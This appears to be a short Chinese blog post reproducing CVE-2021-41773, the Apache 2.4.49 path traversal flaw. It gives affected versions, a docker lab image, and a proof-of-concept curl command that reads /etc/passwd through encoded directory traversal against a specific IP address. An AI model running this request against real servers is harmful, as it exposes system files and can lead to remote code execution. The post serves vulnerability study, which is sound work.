常见中间件漏洞复现之【Apache】!

CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
--------------------

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
-------------------

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
-------------------

漏洞复现

打开网页

使用poc

复制代码
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
anqianqi1237 分钟前
上网行为监控系统怎么落地:上网行为监控软件能管哪几件事
运维·安全·网络安全·电脑
小程序设计10 分钟前
网络安全漏洞综合实验场设计与开发
安全·web安全
数据知道19 分钟前
密钥管理(KMS)——轮换、分级、HSM 硬件安全模块
网络安全·密码学·哈希算法
betazhou20 分钟前
Apache seatunel常用配置参数解析说明
apache·seatunnel
hasty1 小时前
升级之后仍要加认证:CVE-2026-59971 的补丁边界与工程启示
安全
吴佳浩 Alben10 小时前
Agent 安全红线:越狱防御、间接注入与数据防泄漏实战
人工智能·安全·语言模型·架构·ai编程
拿本唠嗑AI研究11 小时前
智能时代,AI安全治理重塑产业风口:一份政策解读
人工智能·安全·风口·政策·机会
中科三方14 小时前
两家域名注册商资质被ICANN终止:企业域名资产安全再受关注
前端·网络·安全·域名
huaqisafty14 小时前
网络赌博治安治理难点解析
网络安全·华企盾·社会治安治理·网赌赌博治理
Flynt16 小时前
两天传了 2000 个包:OpenAI 的 Agent 是怎么把 RubyGems 当硬盘用的
安全·openai·ai编程